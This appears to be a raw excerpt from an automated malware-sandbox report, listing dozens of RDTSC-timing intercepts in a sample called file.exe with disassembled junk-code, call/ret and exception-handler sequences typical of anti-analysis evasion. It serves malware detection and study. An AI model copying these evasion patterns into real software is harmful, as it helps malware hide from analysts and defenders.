Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B86542 second address: B86548 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B81235 second address: B81242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8406A second address: B84070 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B81242 second address: B81247 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B89712 second address: B89718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8233E second address: B82344 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B84070 second address: B84074 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B81247 second address: B8124D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B89718 second address: B89741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jg 00007FF624B4E7D6h 0x00000010 push edx 0x00000011 pop edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 popad 0x00000015 jnp 00007FF624B4E7DEh 0x0000001b push eax 0x0000001c push edx 0x0000001d push edx 0x0000001e pop edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B84074 second address: B8408C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF624C752FCh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B89741 second address: B89745 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8408C second address: B8414B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FF624C752FCh 0x0000000e popad 0x0000000f nop 0x00000010 xor bx, F20Ah 0x00000015 push dword ptr fs:[00000000h] 0x0000001c push 00000000h 0x0000001e push esi 0x0000001f call 00007FF624C752F8h 0x00000024 pop esi 0x00000025 mov dword ptr [esp+04h], esi 0x00000029 add dword ptr [esp+04h], 00000014h 0x00000031 inc esi 0x00000032 push esi 0x00000033 ret 0x00000034 pop esi 0x00000035 ret 0x00000036 add dword ptr [ebp+1244E042h], ecx 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 add ebx, 5A3A60A7h 0x00000049 sub dword ptr [ebp+122D1DCDh], edi 0x0000004f mov eax, dword ptr [ebp+122D00ADh] 0x00000055 push 00000000h 0x00000057 push edi 0x00000058 call 00007FF624C752F8h 0x0000005d pop edi 0x0000005e mov dword ptr [esp+04h], edi 0x00000062 add dword ptr [esp+04h], 00000017h 0x0000006a inc edi 0x0000006b push edi 0x0000006c ret 0x0000006d pop edi 0x0000006e ret 0x0000006f mov bx, 6600h 0x00000073 push FFFFFFFFh 0x00000075 jp 00007FF624C752FCh 0x0000007b mov edi, dword ptr [ebp+122D2CA3h] 0x00000081 sub ebx, dword ptr [ebp+122D1995h] 0x00000087 push eax 0x00000088 push eax 0x00000089 push edx 0x0000008a pushad 0x0000008b jmp 00007FF624C75309h 0x00000090 push ebx 0x00000091 pop ebx 0x00000092 popad 0x00000093 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B81356 second address: B81360 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF624B4E7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8AD08 second address: B8AD0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B81360 second address: B81366 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8C299 second address: B8C2FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FF624C752F6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 mov bx, cx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007FF624C752F8h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 call 00007FF624C75302h 0x00000035 mov bx, 56A7h 0x00000039 pop edi 0x0000003a push 00000000h 0x0000003c push ecx 0x0000003d mov bl, 8Bh 0x0000003f pop ebx 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 jl 00007FF624C752FCh 0x00000049 jno 00007FF624C752F6h 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8B547 second address: B8B558 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF624B4E7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8B558 second address: B8B55C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8E2F0 second address: B8E351 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov edi, 45598F98h 0x0000000f push 00000000h 0x00000011 sbb bl, FFFFFFB7h 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007FF624B4E7D8h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 xchg eax, esi 0x00000031 push esi 0x00000032 jmp 00007FF624B4E7E8h 0x00000037 pop esi 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b push ecx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8E351 second address: B8E356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8F271 second address: B8F275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8F275 second address: B8F292 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF624C75303h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9035B second address: B9035F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9035F second address: B90363 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8D3D8 second address: B8D3DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8E4AC second address: B8E4BA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FF624C752F6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B924E0 second address: B924EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B916B5 second address: B916CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 popad 0x00000009 push eax 0x0000000a jo 00007FF624C75300h 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8C488 second address: B8C50F instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF624B4E7DCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dword ptr [ebp+1244E12Ch], esi 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007FF624B4E7D8h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 00000019h 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 and bh, FFFFFFF1h 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c push 00000000h 0x0000003e push ebp 0x0000003f call 00007FF624B4E7D8h 0x00000044 pop ebp 0x00000045 mov dword ptr [esp+04h], ebp 0x00000049 add dword ptr [esp+04h], 0000001Ch 0x00000051 inc ebp 0x00000052 push ebp 0x00000053 ret 0x00000054 pop ebp 0x00000055 ret 0x00000056 movsx ebx, si 0x00000059 mov eax, dword ptr [ebp+122D0CB1h] 0x0000005f xor bh, FFFFFFB3h 0x00000062 push FFFFFFFFh 0x00000064 sbb ebx, 33D388C9h 0x0000006a nop 0x0000006b pushad 0x0000006c push eax 0x0000006d push edx 0x0000006e pushad 0x0000006f popad 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8C50F second address: B8C523 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B933D3 second address: B933DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FF624B4E7D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B92655 second address: B92659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B92659 second address: B92662 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B93540 second address: B935A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a popad 0x0000000b nop 0x0000000c adc bl, FFFFFFD0h 0x0000000f push dword ptr fs:[00000000h] 0x00000016 mov dword ptr fs:[00000000h], esp 0x0000001d mov bx, CDE2h 0x00000021 mov eax, dword ptr [ebp+122D0DB5h] 0x00000027 pushad 0x00000028 cld 0x00000029 call 00007FF624C75306h 0x0000002e pop esi 0x0000002f popad 0x00000030 push FFFFFFFFh 0x00000032 push esi 0x00000033 pop ebx 0x00000034 nop 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FF624C75308h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B935A2 second address: B935B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2F22F second address: B2F233 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9CCF6 second address: B9CD1A instructions: 0x00000000 rdtsc 0x00000002 je 00007FF624B4E7D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FF624B4E7E0h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9CD1A second address: B9CD1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9CD1E second address: B9CD22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9C636 second address: B9C649 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF624C752F6h 0x00000008 jng 00007FF624C752F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA0DE3 second address: BA0DFC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007FF624B4E7DCh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA0DFC second address: BA0E0F instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF624C752F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA0E0F second address: BA0E16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA0E16 second address: BA0E20 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF624C752FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA6B50 second address: BA6B56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA62E8 second address: BA62FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF624C752F6h 0x0000000a pop eax 0x0000000b jl 00007FF624C752FCh 0x00000011 jbe 00007FF624C752F6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA62FF second address: BA6305 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA6305 second address: BA6311 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA6311 second address: BA6315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA6315 second address: BA632D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75304h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA632D second address: BA6341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e ja 00007FF624B4E7D6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA6341 second address: BA6349 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA6349 second address: BA634F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA634F second address: BA6353 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA6353 second address: BA6361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FF624B4E7D6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA6658 second address: BA6675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF624C75309h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA67F5 second address: BA67F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA6964 second address: BA6978 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007FF624C752FCh 0x0000000e ja 00007FF624C752F6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAAA5E second address: BAAA7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAAA7D second address: BAAA81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAAA81 second address: BAAA8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB35C3 second address: BB35F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF624C752F6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jmp 00007FF624C75300h 0x00000012 jo 00007FF624C752F8h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FF624C752FBh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2392 second address: BB239B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB239B second address: BB239F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB24FA second address: BB2500 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2500 second address: BB2504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2504 second address: BB251B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007FF624B4E7D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 js 00007FF624B4E7D6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB251B second address: BB251F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2823 second address: BB282B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB282B second address: BB2848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF624C752FDh 0x0000000b ja 00007FF624C752F6h 0x00000011 popad 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2848 second address: BB285C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007FF624B4E7DEh 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB285C second address: BB2860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2E97 second address: BB2EA3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 ja 00007FF624B4E7D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2EA3 second address: BB2EAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FF624C752F6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB2EAF second address: BB2ED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF624B4E7DDh 0x0000000f jno 00007FF624B4E7DAh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B75DA6 second address: B75DB2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B75DB2 second address: B75E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF624B4E7E7h 0x00000009 popad 0x0000000a jns 00007FF624B4E7DCh 0x00000010 popad 0x00000011 nop 0x00000012 pushad 0x00000013 mov dword ptr [ebp+122D199Bh], edi 0x00000019 mov ax, dx 0x0000001c popad 0x0000001d mov cx, 734Ch 0x00000021 lea eax, dword ptr [ebp+1247AADFh] 0x00000027 cmc 0x00000028 add edi, dword ptr [ebp+122D2E6Eh] 0x0000002e nop 0x0000002f jnp 00007FF624B4E7E0h 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B75E03 second address: B75E16 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push edx 0x00000009 ja 00007FF624C752F6h 0x0000000f pop edx 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B75EC7 second address: B75ECC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B75ECC second address: B75ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B75F82 second address: B75F87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B76298 second address: B762B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF624C75306h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B762B9 second address: B762BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B762BF second address: B762C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B762C3 second address: B762C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
